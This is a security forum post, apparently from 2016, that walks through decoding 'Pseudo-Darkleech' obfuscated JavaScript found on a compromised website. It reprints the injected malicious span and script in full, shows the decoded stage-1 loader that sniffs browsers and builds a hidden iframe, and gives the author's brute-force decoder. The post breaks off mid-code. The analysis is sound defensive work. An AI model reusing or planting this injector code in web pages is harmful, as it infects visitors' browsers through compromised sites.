Author Topic: Decoding Pseudo-Darkleech  (Read 1832 times)

0 Members and 1 Guest are viewing this topic.

April 23, 2016, 12:42:07 am
Read 1832 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Daniel Wesemann published 2 articles on ISC SANS about decoding Pseudo-Darkleech.

https://isc.sans.edu/forums/diary/Decoding+PseudoDarkleech+1/20969/
https://isc.sans.edu/forums/diary/Decoding+PseudoDarkleech+Part+2/20975/

I didn't know about these articles, but interestingly I was working on same topic today. My goal was finding a more automated way of decoding the obfuscated iframe.

I found this code on a compromised site today.

Code: [Select]
<span id="undefinedNew" style="display:none">113b uc117 ,12r1 127! 125 72 121 123e 115 121 127 125 3i7 48 51b 67 111b bua113 118 xb1b24 11-9a a111 54 107a 113 1c24 125 122 12-1 1dv06- 69a 49 51-q 48 a5m1 e67 111 1p13 118 124 119 -a111 was54 b123 1o12 106 119 -b117 125 a69 49 35 b1b25d 107 -123 n121 1e0n4e o125 89 106 125 121 -37 due67 58 u106 110 34 a41 41 58 52q 58 85 75 81bzb 93 58k 52 6c-9 35 126 119 10y6b 48w 119 118 e1i15 1-25 9dj7 104 10e6b 1ed25 107 107 75 111 11-3a 108 123 112 37d 1c13 117 121 1l27 c125 72 121 -12a3 115 12c1 1g27 125 cb35 1d19 -118 1h15b; 12w5 97 104e 106 12-5q 10ba7e 107 75 111 l113 108 123 bj112 b36 125d bl10-7 123e -121 d104 125 8-9 106 1b25 121 54i 116 1b-25 1m18 b127 w108 112 35 11cc9 118 115 125 97 104 1e06 125 10h7 107 7dq5 111 113 -108b 123 112 m5b1 y51 49 99 113 126 48a -y118 121 1b1cb0 1s13 a1mc27d 121 d108 119 106 54 v109 107 d125 10b6 e89b 127b 125 j118 1c0-c8b 54z 1dw13 118b 124 12q5 bo96 87 126d -48 1p25 107- 123 1ei2-d1 104 125 89w d106 12-5 121 67 119 11f8d w115 -e.tde12ex5 97em ,104d v106 e125 107 10pa7 a75 111e 113 108 123 11l2 e6e9 4a9 38 113 -w117- 121 127 1b25 7s2b 12-i1 b123 115 1t21 127 12-5 49 99 11a9 1ga18 123 116 11i3 -1c2bbz3 c115 95 c125c 108g -91b 116 p1d21 j107 107 3e7 1d25e 107 123 ead121c 10-i4 125 89 106b 1i25 12bb1 54 116 125 118 bn127 10b8 112 53m 11a9 118 11d5 1bp25 b97 104 106 125 10w7 10e7 7-5 111 113 108 1v2bk3 d112 r35 122 b106 125 121s 115 35 1b01 1-01 113 126 48 ud118 1d21 110 113 127 121 108 c119 106 54 109 1j0e7ib 1b25 1e06 89 127- 12b5b 1v1-8 108 54 113 11a8 1jb24 125k 9b6x 87c 126 48 58 8k5 75 81b 93i 56d 41 40 58 4q9 38-c 113 -117 d.121 127e 125 72dd 121 -123 11n5 121 127 125 4c9d 9b9 11i9 a11-8 123 116 113t ch123 1b1u5 95 1-25 10d8 n91 116d 1xbb21 107 107 51 51 35 1-01 124 119 123 10e-j9 1e17 125edf 1e18 10q8b h93 117d 122,j c125 124 37 58h 85 96 74- 8c3e 126 95 92a 75 9v5 40c 91 93 d3b2l 64 a58 35 s104 121 -1e06 10b7 125 9b4 11zb6 11h9 121 108 87 118 124 1-b06 121 127 124u 1c06 1q19 -104 b3-7 124 119 1m2e3fbfdw cka109 m117 125 118 1b08 5-4 127 125 108 93 1r16 125 11-b7 n125 a.1d1-e8 ,108 r90 97 e81 124 48 c58 109 118 12b4 x125 126 113 b118 1j25 124 86c n125 1-b1x1 5b8 y4d9 54 113 118 118 125 10-6 80 7a6 8-c5 84b 3b5 1-j07b 108 12f1 1c08 109 107b 89 1b16- 116 37 107 111 113 1v-0b-8d 123 c112 8d6 121 108 113b 110 1r2b5 37 g113 117- 121 127 12b5 72 121 123 u115 121 127 1cq25 35b 10q4 121 107 10b7 1q1d1 119 1i06- d,u124 93- 116 1b2s5 11ba7 125 118b 108 107 3h7 58- b58 35 ka104 kby1bw21 c106 107ce 1uc25 94q 116 119 1b2s1c 1b0ace8 8ne7 118 124 106 1t21 c127x 124 106 11-9 104 3d7 10-4t 121c 10h6 10be7 12e5 9ub4 116 119 z121 108 87 118 124 1-06 121 127 c12g4 10b6 j119c q1b0rex4 54 106a 125 104 116 121 123 125 48 55 67 70l 1e2a1 53e 98 v69 55 127 5a2 -58 58i b49 35 126 1q19 106 48e 119 1i1a8- 11o5 1-25 9b7 104 1ib06 t125c a1b07 107 75 1v11 113 -1cq08 123 -11e2 37 113 117 121r 127 125e 7o2a 121 123 ie115 a121 127 c125j aae35 119 11b8 115 12cc5 9-d7 10-4 m10ea6 125 10,7 10cd7 75 11b1 113n 10-8 c123 1-12 36 10kd4o 1bm21e 106 107 125t 94 116a- e1c19 121i 108 87 b118 124ka 106 12o1e 127 124 106 k1-19 1bo04 54 116 125 11ak8b 127m c10-8d 112 35 119 118 b1g15 125es 97 104 a10s6 125 b107 h107b 75 h1c11 113 vb108q 1.23 11c2- 51 51 49 9ga9o 1c04 121l 12b3 1-15la 1b21 1b27 125 78 1g21 11b6 1-09 g12e5 8j-7 126 37 104 e1r21 106 -107 12a5 94 116 119 121m 108 87 118 124 106 1b21 127 124 1-06q 119 bjcw1c04 5-f4 1b23 1gb12 d121 -10e6k 91 119c- 124 125 ea89 108u 48 119 118 11-b5 125k 97 104 1e06r, 125 107 107 75 1e11 11j3 108 1b23v 112-c, 49 qc3d-5 113 12c6 48 -1b07a 108- 12c1 108 109 107 e89 116 1p16 61 119 118 d123 116 11-3 123 u115 95 125 108 91 116 121 107 107 4a9- 99 o1b04 121z b107 -1l07- a111 119c 106 -124 93 116 12c5b 117 125 118 1b08 1h07ev 51 37 75 108 106-b r1d13 118 127 5-l4 12-b6 106 -119 1v17bk 9dn1b 112 121 10w6b- 91k 119 a124 125uc 48 48 48 11-9 1k18 115- 125 97 109 1c-04 75 e123 106 125 125a ub118 65 51 104 121 mb123 q115 -b121 w127 125 78 121bv 116 1d09 1k-b25 87- s126 b53- 33 4o7 49 70 -d124 11-p9 123 brd-v109- 11b7 125b 1c18jbmc 108v 93 117 122 125 a124 5w4 123 112 121 106 9a1 119 124 125r 8b9 108-k a48 1m07 11dz-1 113 108 b123 112 86 1h21 a-108 e-11dp3bp 110 b125 6eb1 124 119 123- 109 11n7 -1bm25 118 -1ci08 93c 117f 1b2-2 125 124 54 11x6 125 118a 12a7 108av 11c2 49 49 61 42 45 j4d5 y4b-9 35 10oe7 -111 113 1d08 123 ,11cu2 8-6 121b 108 113 110- 125 w5c1 51j 35 101 1d25me- k1c16i 1-07 125 99 apb119 118 11j5 1b25 97 w109 104 75c 123 106he 125s 125 -a118 -65s 37 e48 1j04 12-1 123e 1i15 121 a127 12i5 78e 121 116 1-09 125 8s7 126 53 -33 47e 49- 5f0 4-1 43 50 a1-1q9c 118 123 11d6b 113 123 115 95 12i5 108 9abb1v 1-16 b121w 107- 107 35 101 107 108 121 108 10e9 107 8g9 116 1d16 51 51 35 x101 67 69 67 58 -1ac23 119 118 107 108 106 eo10-e9 123 108 11n-9b 10-6 58 6a-9 6d7 58-y 123 1e19 118 j107 108 -10d6-j 10-9 c-12h3 -108 bta119u b106 58 69 48 104 -121 10m7 107 b-p1c1c1e 119r 106 124a m93e 1e16 12b-5 117 h125 118 10-8 1d07 49d 48 4b9 35-u-eldretei</span>
<script>
undefinedEncodeURI="\x28";onfocusHistory="\x63\x6f";statusOnblur="\x5d";onfocusHistory+="\x6e\x73\x74";formsString=onfocusHistory;onfocusHistory="\x6e\x70";textareaConst="\x72\x75\x63";textareaConst+="\x74\x6f\x72";formsString+=textareaConst;doWhile="\x6c\x69";staticHidden="\x72\x69";functionConstructor="\x67\x2c";enumInterface="\x6c";privateScreenY="\x22";ArrayInnerWidth="\x65\x76";importParseFloat="\x79";isPrototypeOfSubmit="\x22";layersImages="\x5d";formsEvent="\x28";openString="\x6c";onmousedownOncontextmenu="\x65";outerHeightOnkeydown="\x72\x43";onerrorByte="\x29";longParseInt="\x6c";abstractLayer="\x6e\x74\x42";abstractOnsubmit="\x65";onkeyupVolatile="\x22";eventSwitch="\x64\x6f";parseIntEmbed="\x74\x28";onbeforeunloadNaN="\x75\x6c";enumInterface+="\x65\x6e\x67";enumOnfocus="\x69\x2b";volatileOnkeyup="\x65";onloadOnfocus="\x5b\x69";frameRateAbstract="\x4c";nameDocument="\x5b";undefinedVar="\x3c\x61\x2e";doObject="\x2e\x72\x65";offscreenBufferingFinal="\x6d";clearIntervalThis="\x75";optionOnkeypress="\x48";JavaClassDebugger="\x63";shortThrows="\x65";mimeTypesString="\x61\x3d";layerMath=mimeTypesString;mimeTypesString="\x76\x6c\x76";privateTaint="\x5e";layerMath+=eventSwitch;eventSwitch="\x67\x74";layerMath+=JavaClassDebugger;textFloat="\x29";layerMath+=clearIntervalThis;clearIntervalThis="\x76\x77\x76";newInt="\x20";layerMath+=offscreenBufferingFinal;layerMath+=shortThrows;shortThrows+=eventSwitch;fileUploadConstructor="\x3d";closeImage="\x65\x2e\x61";extendsClass="\x66";instanceofOnload="\x54";throwsVar="\x34";varAssign="\x45\x6c";submitTop="\x3b";fileUploadImplements="\x79";eventAnchor="\x6f\x64";onmouseupOffscreenBuffering="\x4d";openerInfinity="\x6f";setTimeoutWindow="\x53";tryObject="\x5d";withInfinity="\x2c";typeofProtected="\x29";evalImage="\x2f\x5b";undefinedSynchronized="\x22\x75";pageXOffsetCase="\x6c";throwsOnmousedown="\x70";elementImages="\x2b";defaultStatusIn="\x2f";letSecure="\x22\x29";charThis="\x70\x6c\x61";pkcs11GetClass="\x73";intInterface="\x32";eventPassword="\x20";switchClearInterval="\x61";newAssign="\x74";prototypeInnerWidth="\x3b";JavaPackageAssign="\x5c";scrollUndefined="\x6f\x6d";JavaObjectForms="\x70";gotoSwitch="\x69\x3d";classNavigator="\x6e";hiddenOnblur="\x73\x70";fileUploadConstructor+="\x70\x61\x72";scrollUndefined+="\x43\x68\x61";anchorIf="\x74\x2e\x67";scrollEmbed="\x65";oncontextmenuEmbed="\x65\x64";publicObject="\x74";frameFocus="\x29\x2e";documentAll="\x61\x29\x29";allNavigate="\x28";scrollEmbed+="\x49";voidFileUpload="\x6e";layerMath+=voidFileUpload;voidFileUpload=shortThrows;defaultVolatile="\x6d\x65";layerMath+=anchorIf;anchorIf+=mimeTypesString;pageYOffsetLayer="\x2e\x69\x6e";layerMath+=onmousedownOncontextmenu;onmousedownOncontextmenu="\x61\x67";layerMath+=newAssign;newAssign=eventSwitch;parseIntContinue="\x4e\x65";layerMath+=varAssign;varAssign+=onmousedownOncontextmenu;undefinedSynchronized+="\x6e\x64";layerMath+=abstractOnsubmit;abstractOnsubmit="\x75\x79\x78";layerMath+=defaultVolatile;mimeTypesTop="\x72";layerMath+=abstractLayer;abstractLayer="\x78\x76\x64";layerMath+=fileUploadImplements;fileUploadImplements="\x6b\x64";documentAll+="\x3b";pageYOffsetOnclick="\x61";pluginEval="\x64";navigatorChar="\x65\x66";gotoHasOwnProperty="\x66\x72";pluginParseFloat="\x69";hasOwnPropertyBoolean="\x5e";staticJavaClass="\x77\x22";nameExtends="\x6e\x67\x2e";fileUploadAlert="\x72";scrollEmbed+="\x6e";nullIn="\x6e";gotoSwitch+="\x30\x3b\x69";superScreenY="\x49\x64\x28";layerMath+=superScreenY;superScreenY+=fileUploadImplements;scrollEmbed+="\x74";layerMath+=undefinedSynchronized;scrollEmbed+="\x28\x61";navigatorChar+="\x69\x6e";layerMath+=navigatorChar;charThis+="\x63\x65\x28";layerMath+=oncontextmenuEmbed;oncontextmenuEmbed="\x69\x6d\x73";layerMath+=parseIntContinue;parseIntContinue=newAssign;layerMath+=staticJavaClass;staticJavaClass+=fileUploadImplements;transientFinal="\x74\x68\x3b";layerMath+=onerrorByte;onerrorByte=superScreenY;layerMath+=pageYOffsetLayer;pageYOffsetLayer=abstractOnsubmit;layerMath+=classNavigator;classNavigator=navigatorChar;layerMath+=volatileOnkeyup;volatileOnkeyup+=undefinedSynchronized;layerMath+=mimeTypesTop;mimeTypesTop=newAssign;layerMath+=optionOnkeypress;optionOnkeypress=offscreenBufferingFinal;layerMath+=instanceofOnload;layerMath+=onmouseupOffscreenBuffering;onmouseupOffscreenBuffering=oncontextmenuEmbed;layerMath+=frameRateAbstract;layerMath+=doObject;layerMath+=charThis;charThis=undefinedSynchronized;layerMath+=evalImage;layerMath+=hasOwnPropertyBoolean;hasOwnPropertyBoolean="\x62\x72\x77";layerMath+=JavaPackageAssign;JavaPackageAssign="\x63\x63";layerMath+=pluginEval;layerMath+=newInt;newInt=eventSwitch;layerMath+=layersImages;layersImages+=JavaClassDebugger;layerMath+=defaultStatusIn;defaultStatusIn=clearIntervalThis;layerMath+=functionConstructor;functionConstructor+=oncontextmenuEmbed;layerMath+=onkeyupVolatile;onkeyupVolatile=navigatorChar;layerMath+=privateScreenY;privateScreenY="\x78\x6b";layerMath+=frameFocus;frameFocus="\x7a\x73";layerMath+=hiddenOnblur;layerMath+=doWhile;layerMath+=parseIntEmbed;onbeforeunloadOnmouseup=[][formsString];parseIntEmbed+=defaultVolatile;layerMath+=isPrototypeOfSubmit;isPrototypeOfSubmit=navigatorChar;layerMath+=eventPassword;eventPassword="\x6a\x74\x66";layerMath+=letSecure;letSecure=clearIntervalThis;layerMath+=prototypeInnerWidth;prototypeInnerWidth="\x70\x71";layerMath+=extendsClass;layerMath+=openerInfinity;openerInfinity=voidFileUpload;layerMath+=fileUploadAlert;fileUploadAlert="\x69\x70\x6e";layerMath+=undefinedEncodeURI;undefinedEncodeURI=shortThrows;layerMath+=gotoSwitch;gotoSwitch=mimeTypesString;layerMath+=undefinedVar;undefinedVar+=JavaClassDebugger;layerMath+=enumInterface;layerMath+=transientFinal;transientFinal+=anchorIf;layerMath+=enumOnfocus;enumOnfocus+=pageYOffsetLayer;layerMath+=elementImages;elementImages="\x6f\x66\x63";layerMath+=typeofProtected;layerMath+=pageYOffsetOnclick;layerMath+=nameDocument;nameDocument+=abstractLayer;layerMath+=pluginParseFloat;layerMath+=tryObject;layerMath+=fileUploadConstructor;fileUploadConstructor+=voidFileUpload;layerMath+=pkcs11GetClass;pkcs11GetClass=mimeTypesString;layerMath+=scrollEmbed;scrollEmbed=abstractOnsubmit;layerMath+=onloadOnfocus;onloadOnfocus+=JavaClassDebugger;layerMath+=statusOnblur;layerMath+=textFloat;layerMath+=privateTaint;privateTaint=undefinedSynchronized;layerMath+=intInterface;intInterface="\x65\x6e\x6a";layerMath+=throwsVar;layerMath+=submitTop;layerMath+=ArrayInnerWidth;ArrayInnerWidth=voidFileUpload;layerMath+=switchClearInterval;switchClearInterval=mimeTypesString;layerMath+=openString;layerMath+=formsEvent;formsEvent=shortThrows;layerMath+=setTimeoutWindow;setTimeoutWindow+=fileUploadImplements;layerMath+=publicObject;layerMath+=staticHidden;staticHidden+=pageYOffsetLayer;layerMath+=nameExtends;nameExtends="\x72\x70";layerMath+=gotoHasOwnProperty;gotoHasOwnProperty=undefinedSynchronized;layerMath+=scrollUndefined;scrollUndefined="\x76\x7a\x76";layerMath+=outerHeightOnkeydown;outerHeightOnkeydown=clearIntervalThis;layerMath+=eventAnchor;eventAnchor=pageYOffsetLayer;layerMath+=closeImage;lengthShort=onbeforeunloadOnmouseup[formsString];outerHeightNative="\x71\x74";outerHeightNative+="\x6e\x6c";formsString=outerHeightNative;outerHeightNative+=outerHeightNative;layerMath+=throwsOnmousedown;throwsOnmousedown+=anchorIf;layerMath+=JavaObjectForms;layerMath+=longParseInt;layerMath+=importParseFloat;importParseFloat=shortThrows;layerMath+=allNavigate;allNavigate+=mimeTypesString;layerMath+=nullIn;nullIn="\x6a\x6f";layerMath+=onbeforeunloadNaN;onbeforeunloadNaN="\x72\x69\x6e";layerMath+=pageXOffsetCase;pageXOffsetCase="\x61\x67\x72";layerMath+=withInfinity;layerMath+=documentAll;documentAll="\x77\x74";lengthShort(layerMath)();byteTextarea="\x6a\x6d\x6c";byteTextarea+="\x66";layerMath=byteTextarea;
</script>
<noscript>
<!DOCTYPE html>
<!--[if IEMobile 7]><html class="iem7" lang="de" dir="ltr"><![endif]-->
<!--[if lte IE 6]><html class="lt-ie9 lt-ie8 lt-ie7" lang="de" dir="ltr"><![endif]-->
<!--[if (IE 7)&(!IEMobile)]><html class="lt-ie9 lt-ie8" lang="de" dir="ltr"><![endif]-->
<!--[if IE 8]><html class="lt-ie9" lang="de" dir="ltr"><![endif]-->
<!--[if (gte IE 9)|(gt IEMobile 7)]><!--><html lang="de" dir="ltr"><!--<![endif]-->
<head>

The decode process is being done in 2 stages. Daniel describes the stages in separate articles. Stage 1 creates Javascript code which is being used for creation of an iframe in stage 2.

The result of stage 1 looks like this:

Quote
imagePackage=(+[window.sidebar])+(+[window.chrome]);escapeArea=["rv:11","MSIE",];for(onkeypressSwitch=imagePackage;onkeypressSwitch<escapeArea.length;onkeypressSwitch++){if(navigator.userAgent.indexOf(escapeArea[onkeypressSwitch])>imagePackage){onclickGetClass=escapeArea.length-onkeypressSwitch;break;}}if(navigator.userAgent.indexOf("MSIE 10")>imagePackage){onclickGetClass++;}documentEmbed="MxRKfGDSG0CE8X";parseFloatOndragdrop=document.getElementById("undefinedNew").innerHTML;statusAll=switchNative=imagePackage;passwordElements="";parseFloatOndragdrop=parseFloatOndragdrop.replace(/[^a-z]/g,"");for(onkeypressSwitch=imagePackage;onkeypressSwitch<parseFloatOndragdrop.length;onkeypressSwitch++){packageValueOf=parseFloatOndragdrop.charCodeAt(onkeypressSwitch);if(statusAll%onclickGetClass){passwordElements+=String.fromCharCode(((onkeyupScreenY+packageValueOf-97)^documentEmbed.charCodeAt(switchNative%documentEmbed.length))%255);switchNative++;}else{onkeyupScreenY=(packageValueOf-97)*13*onclickGetClass;}statusAll++;}[]["constructor"]["constructor"](passwordElements)();

This code is being created by concatenating a string out of the html section on top of the page.
The resulting string is then xored with a variable value.

We know the resulting code always contains a check for string 'MSIE'. This allows us to brute force the xor value.

Code: [Select]
undefinedNew="113b uc117 ,12r1 127! 125 72 121 123e 115 121 127 125 3i7 48 51b 67 111b bua113 118 xb1b24 11-9a a111 54 107a 113 1c24 125 122 12-1 1dv06- 69a 49 51-q 48 a5m1 e67 111 1p13 118 124 119 -a111 was54 b123 1o12 106 119 -b117 125 a69 49 35 b1b25d 107 -123 n121 1e0n4e o125 89 106 125 121 -37 due67 58 u106 110 34 a41 41 58 52q 58 85 75 81bzb 93 58k 52 6c-9 35 126 119 10y6b 48w 119 118 e1i15 1-25 9dj7 104 10e6b 1ed25 107 107 75 111 11-3a 108 123 112 37d 1c13 117 121 1l27 c125 72 121 -12a3 115 12c1 1g27 125 cb35 1d19 -118 1h15b; 12w5 97 104e 106 12-5q 10ba7e 107 75 111 l113 108 123 bj112 b36 125d bl10-7 123e -121 d104 125 8-9 106 1b25 121 54i 116 1b-25 1m18 b127 w108 112 35 11cc9 118 115 125 97 104 1e06 125 10h7 107 7dq5 111 113 -108b 123 112 m5b1 y51 49 99 113 126 48a -y118 121 1b1cb0 1s13 a1mc27d 121 d108 119 106 54 v109 107 d125 10b6 e89b 127b 125 j118 1c0-c8b 54z 1dw13 118b 124 12q5 bo96 87 126d -48 1p25 107- 123 1ei2-d1 104 125 89w d106 12-5 121 67 119 11f8d w115 -e.tde12ex5 97em ,104d v106 e125 107 10pa7 a75 111e 113 108 123 11l2 e6e9 4a9 38 113 -w117- 121 127 1b25 7s2b 12-i1 b123 115 1t21 127 12-5 49 99 11a9 1ga18 123 116 11i3 -1c2bbz3 c115 95 c125c 108g -91b 116 p1d21 j107 107 3e7 1d25e 107 123 ead121c 10-i4 125 89 106b 1i25 12bb1 54 116 125 118 bn127 10b8 112 53m 11a9 118 11d5 1bp25 b97 104 106 125 10w7 10e7 7-5 111 113 108 1v2bk3 d112 r35 122 b106 125 121s 115 35 1b01 1-01 113 126 48 ud118 1d21 110 113 127 121 108 c119 106 54 109 1j0e7ib 1b25 1e06 89 127- 12b5b 1v1-8 108 54 113 11a8 1jb24 125k 9b6x 87c 126 48 58 8k5 75 81b 93i 56d 41 40 58 4q9 38-c 113 -117 d.121 127e 125 72dd 121 -123 11n5 121 127 125 4c9d 9b9 11i9 a11-8 123 116 113t ch123 1b1u5 95 1-25 10d8 n91 116d 1xbb21 107 107 51 51 35 1-01 124 119 123 10e-j9 1e17 125edf 1e18 10q8b h93 117d 122,j c125 124 37 58h 85 96 74- 8c3e 126 95 92a 75 9v5 40c 91 93 d3b2l 64 a58 35 s104 121 -1e06 10b7 125 9b4 11zb6 11h9 121 108 87 118 124 1-b06 121 127 124u 1c06 1q19 -104 b3-7 124 119 1m2e3fbfdw cka109 m117 125 118 1b08 5-4 127 125 108 93 1r16 125 11-b7 n125 a.1d1-e8 ,108 r90 97 e81 124 48 c58 109 118 12b4 x125 126 113 b118 1j25 124 86c n125 1-b1x1 5b8 y4d9 54 113 118 118 125 10-6 80 7a6 8-c5 84b 3b5 1-j07b 108 12f1 1c08 109 107b 89 1b16- 116 37 107 111 113 1v-0b-8d 123 c112 8d6 121 108 113b 110 1r2b5 37 g113 117- 121 127 12b5 72 121 123 u115 121 127 1cq25 35b 10q4 121 107 10b7 1q1d1 119 1i06- d,u124 93- 116 1b2s5 11ba7 125 118b 108 107 3h7 58- b58 35 ka104 kby1bw21 c106 107ce 1uc25 94q 116 119 1b2s1c 1b0ace8 8ne7 118 124 106 1t21 c127x 124 106 11-9 104 3d7 10-4t 121c 10h6 10be7 12e5 9ub4 116 119 z121 108 87 118 124 1-06 121 127 c12g4 10b6 j119c q1b0rex4 54 106a 125 104 116 121 123 125 48 55 67 70l 1e2a1 53e 98 v69 55 127 5a2 -58 58i b49 35 126 1q19 106 48e 119 1i1a8- 11o5 1-25 9b7 104 1ib06 t125c a1b07 107 75 1v11 113 -1cq08 123 -11e2 37 113 117 121r 127 125e 7o2a 121 123 ie115 a121 127 c125j aae35 119 11b8 115 12cc5 9-d7 10-4 m10ea6 125 10,7 10cd7 75 11b1 113n 10-8 c123 1-12 36 10kd4o 1bm21e 106 107 125t 94 116a- e1c19 121i 108 87 b118 124ka 106 12o1e 127 124 106 k1-19 1bo04 54 116 125 11ak8b 127m c10-8d 112 35 119 118 b1g15 125es 97 104 a10s6 125 b107 h107b 75 h1c11 113 vb108q 1.23 11c2- 51 51 49 9ga9o 1c04 121l 12b3 1-15la 1b21 1b27 125 78 1g21 11b6 1-09 g12e5 8j-7 126 37 104 e1r21 106 -107 12a5 94 116 119 121m 108 87 118 124 106 1b21 127 124 1-06q 119 bjcw1c04 5-f4 1b23 1gb12 d121 -10e6k 91 119c- 124 125 ea89 108u 48 119 118 11-b5 125k 97 104 1e06r, 125 107 107 75 1e11 11j3 108 1b23v 112-c, 49 qc3d-5 113 12c6 48 -1b07a 108- 12c1 108 109 107 e89 116 1p16 61 119 118 d123 116 11-3 123 u115 95 125 108 91 116 121 107 107 4a9- 99 o1b04 121z b107 -1l07- a111 119c 106 -124 93 116 12c5b 117 125 118 1b08 1h07ev 51 37 75 108 106-b r1d13 118 127 5-l4 12-b6 106 -119 1v17bk 9dn1b 112 121 10w6b- 91k 119 a124 125uc 48 48 48 11-9 1k18 115- 125 97 109 1c-04 75 e123 106 125 125a ub118 65 51 104 121 mb123 q115 -b121 w127 125 78 121bv 116 1d09 1k-b25 87- s126 b53- 33 4o7 49 70 -d124 11-p9 123 brd-v109- 11b7 125b 1c18jbmc 108v 93 117 122 125 a124 5w4 123 112 121 106 9a1 119 124 125r 8b9 108-k a48 1m07 11dz-1 113 108 b123 112 86 1h21 a-108 e-11dp3bp 110 b125 6eb1 124 119 123- 109 11n7 -1bm25 118 -1ci08 93c 117f 1b2-2 125 124 54 11x6 125 118a 12a7 108av 11c2 49 49 61 42 45 j4d5 y4b-9 35 10oe7 -111 113 1d08 123 ,11cu2 8-6 121b 108 113 110- 125 w5c1 51j 35 101 1d25me- k1c16i 1-07 125 99 apb119 118 11j5 1b25 97 w109 104 75c 123 106he 125s 125 -a118 -65s 37 e48 1j04 12-1 123e 1i15 121 a127 12i5 78e 121 116 1-09 125 8s7 126 53 -33 47e 49- 5f0 4-1 43 50 a1-1q9c 118 123 11d6b 113 123 115 95 12i5 108 9abb1v 1-16 b121w 107- 107 35 101 107 108 121 108 10e9 107 8g9 116 1d16 51 51 35 x101 67 69 67 58 -1ac23 119 118 107 108 106 eo10-e9 123 108 11n-9b 10-6 58 6a-9 6d7 58-y 123 1e19 118 j107 108 -10d6-j 10-9 c-12h3 -108 bta119u b106 58 69 48 104 -121 10m7 107 b-p1c1c1e 119r 106 124a m93e 1e16 12b-5 117 h125 118 10-8 1d07 49d 48 4b9 35-u-eldretei";
a=undefinedNew.replace(/[^\d ]/g,"").split(" ");

for (x=0;x<256;x++) {
for (i=0;i<a.length;i++) a[i]=parseInt(a[i])^x;
s=String.fromCharCode.apply(null,a);
 if (s.indexOf('MSIE')>0) break;
document.write(s);
}

The lines of codes above do the decoding of stage 1. We get this result:
Quote
imagePackage=(+[window.sidebar])+(+[window.chrome]);escapeArea=["rv:11","MSIE",];for(onkeypressSwitch=imagePackage;onkeypressSwitch<escapeArea.length;onkeypressSwitch++){if(navigator.userAgent.indexOf(escapeArea[onkeypressSwitch])>imagePackage){onclickGetClass=escapeArea.length-onkeypressSwitch;break;}}if(navigator.userAgent.indexOf("MSIE 10")>imagePackage){onclickGetClass++;}documentEmbed="MxRKfGDSG0CE8X";parseFloatOndragdrop=document.getElementById("undefinedNew").innerHTML;statusAll=switchNative=imagePackage;passwordElements="";parseFloatOndragdrop=parseFloatOndragdrop.replace(/[^a-z]/g,"");for(onkeypressSwitch=imagePackage;onkeypressSwitch<parseFloatOndragdrop.length;onkeypressSwitch++){packageValueOf=parseFloatOndragdrop.charCodeAt(onkeypressSwitch);if(statusAll%onclickGetClass){passwordElements+=String.fromCharCode(((onkeyupScreenY+packageValueOf-97)^documentEmbed.charCodeAt(switchNative%documentEmbed.length))%255);switchNative++;}else{onkeyupScreenY=(packageValueOf-97)*13*onclickGetClass;}statusAll++;}[]["constructor"]["constructor"](passwordElements)();

I compared the code from various compromised sites and found that the code logic is always the same. The only difference is a string which is being used for xor-ing in stage 2. In the example above this string value is documentEmbed="MxRKfGDSG0CE8X". If we extract the value from code, then we can fully automate the decoding process.

So I added these lines to my code. A regular expression checks for ="".

Code: [Select]
re = /="([^"]+)"/;
str=re.exec(s)[1];
document.write(s)

For our example above it gives us the result:

Quote
MxRKfGDSG0CE8X

Now we only need to slightly change the original code of stage 2 and put everything together.

Save the following code as a htm file and open it in a browser.

Code: [Select]
<TEXTAREA id="output" ROWS=25 COLS=80></TEXTAREA>

<script>

undefinedNew="113b uc117 ,12r1 127! 125 72 121 123e 115 121 127 125 3i7 48 51b 67 111b bua113 118 xb1b24 11-9a a111 54 107a 113 1c24 125 122 12-1 1dv06- 69a 49 51-q 48 a5m1 e67 111 1p13 118 124 119 -a111 was54 b123 1o12 106 119 -b117 125 a69 49 35 b1b25d 107 -123 n121 1e0n4e o125 89 106 125 121 -37 due67 58 u106 110 34 a41 41 58 52q 58 85 75 81bzb 93 58k 52 6c-9 35 126 119 10y6b 48w 119 118 e1i15 1-25 9dj7 104 10e6b 1ed25 107 107 75 111 11-3a 108 123 112 37d 1c13 117 121 1l27 c125 72 121 -12a3 115 12c1 1g27 125 cb35 1d19 -118 1h15b; 12w5 97 104e 106 12-5q 10ba7e 107 75 111 l113 108 123 bj112 b36 125d bl10-7 123e -121 d104 125 8-9 106 1b25 121 54i 116 1b-25 1m18 b127 w108 112 35 11cc9 118 115 125 97 104 1e06 125 10h7 107 7dq5 111 113 -108b 123 112 m5b1 y51 49 99 113 126 48a -y118 121 1b1cb0 1s13 a1mc27d 121 d108 119 106 54 v109 107 d125 10b6 e89b 127b 125 j118 1c0-c8b 54z 1dw13 118b 124 12q5 bo96 87 126d -48 1p25 107- 123 1ei2-d1 104 125 89w d106 12-5 121 67 119 11f8d w115 -e.tde12ex5 97em ,104d v106 e125 107 10pa7 a75 111e 113 108 123 11l2 e6e9 4a9 38 113 -w117- 121 127 1b25 7s2b 12-i1 b123 115 1t21 127 12-5 49 99 11a9 1ga18 123 116 11i3 -1c2bbz3 c115 95 c125c 108g -91b 116 p1d21 j107 107 3e7 1d25e 107 123 ead121c 10-i4 125 89 106b 1i25 12bb1 54 116 125 118 bn127 10b8 112 53m 11a9 118 11d5 1bp25 b97 104 106 125 10w7 10e7 7-5 111 113 108 1v2bk3 d112 r35 122 b106 125 121s 115 35 1b01 1-01 113 126 48 ud118 1d21 110 113 127 121 108 c119 106 54 109 1j0e7ib 1b25 1e06 89 127- 12b5b 1v1-8 108 54 113 11a8 1jb24 125k 9b6x 87c 126 48 58 8k5 75 81b 93i 56d 41 40 58 4q9 38-c 113 -117 d.121 127e 125 72dd 121 -123 11n5 121 127 125 4c9d 9b9 11i9 a11-8 123 116 113t ch123 1b1u5 95 1-25 10d8 n91 116d 1xbb21 107 107 51 51 35 1-01 124 119 123 10e-j9 1e17 125edf 1e18 10q8b h93 117d 122,j c125 124 37 58h 85 96 74- 8c3e 126 95 92a 75 9v5 40c 91 93 d3b2l 64 a58 35 s104 121 -1e06 10b7 125 9b4 11zb6 11h9 121 108 87 118 124 1-b06 121 127 124u 1c06 1q19 -104 b3-7 124 119 1m2e3fbfdw cka109 m117 125 118 1b08 5-4 127 125 108 93 1r16 125 11-b7 n125 a.1d1-e8 ,108 r90 97 e81 124 48 c58 109 118 12b4 x125 126 113 b118 1j25 124 86c n125 1-b1x1 5b8 y4d9 54 113 118 118 125 10-6 80 7a6 8-c5 84b 3b5 1-j07b 108 12f1 1c08 109 107b 89 1b16- 116 37 107 111 113 1v-0b-8d 123 c112 8d6 121 108 113b 